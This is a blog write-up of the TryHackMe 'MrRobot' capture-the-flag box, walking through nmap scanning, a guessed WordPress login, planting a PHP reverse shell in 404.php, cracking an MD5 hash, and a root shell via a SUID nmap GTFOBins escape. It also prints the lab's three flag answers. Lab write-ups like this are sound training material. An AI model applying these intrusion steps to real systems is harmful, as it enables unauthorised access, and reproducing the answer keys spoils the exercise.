Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
TryHackMe - MrRobot
|thm|

Summary

MrRobot,a Linux box is created by user ben, was a easy box.The Initial scan show that robots.txt. which show the first key and fsocity.dic and using that and username elliot we get access to word-press,using which we can get a shell.Cracking the md5 hash we can su as robot user and grab second key. Privilege Escalation was using nmap suid binary we can get a shell as root.

Initial Scan

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Nmap 7.80 scan initiated Thu Apr 30 21:55:50 2020 as: nmap -sC -sV -oN nmap/mrrobot 10.10.130.158
Nmap scan report for 10.10.130.158
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 30 21:56:47 2020 -- 1 IP address (1 host up) scanned in 57.42 seconds

Manual Enumeration

Visiting http://10.10.130.158/robots.txt shows the first key path as key-1-of-3.txt

1
2
3
User-agent: *
fsocity.dic
key-1-of-3.txt

WP-Login

Cracking the password with user elliot (This was a guess based on the box name) we get the password as ER28-0652

Low Privilege Shell

Using the appearance we can change the code of any page so i edited 404.php and placed a pentestmoney php-code to get a shell as demon

User

From the User robot home directory we can see there is a password.raw-md5 which we can read

1
2
3
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Cracking the hash c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz

using that we can su as robot and can read key-2-of-3.txt

1
2
3
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Privilege Escalation

Lets run linpeas.sh

we see the kernel is vulnerable to exploit.

Lets try to see if we have some other easier way to Privilege Escalate.

we also see

1
/usr/local/bin/nmap

has SUID bit set lets check gtfobins to see how to get a shell using nmap

we see we can get a shell using

1
2
3
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF

but the nmap version installed doesn’t support –script but we see an interesting flag as --interactive

using which we can get a shell as root

1
2
3
4
5
# uname -a;id;hostname
uname -a;id;hostname
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
linux

and we can grab key-3-of-3.txt as

1
2
3
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

And we have pwned this box.

Questions to Answer

  1. What is key 1?

    1
    073403c8a58a1f80d943455fb30724b9

  2. What is key 2?

    1
    822c73956184f694993bede3eb39f959

  3. What is key 3?

    1
    04787ddef27c3dee1ee161b21670b4e4
Author: Shubham Kumar
Link: https://f3v3r.in/thm/mrrobot/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteuptryhackme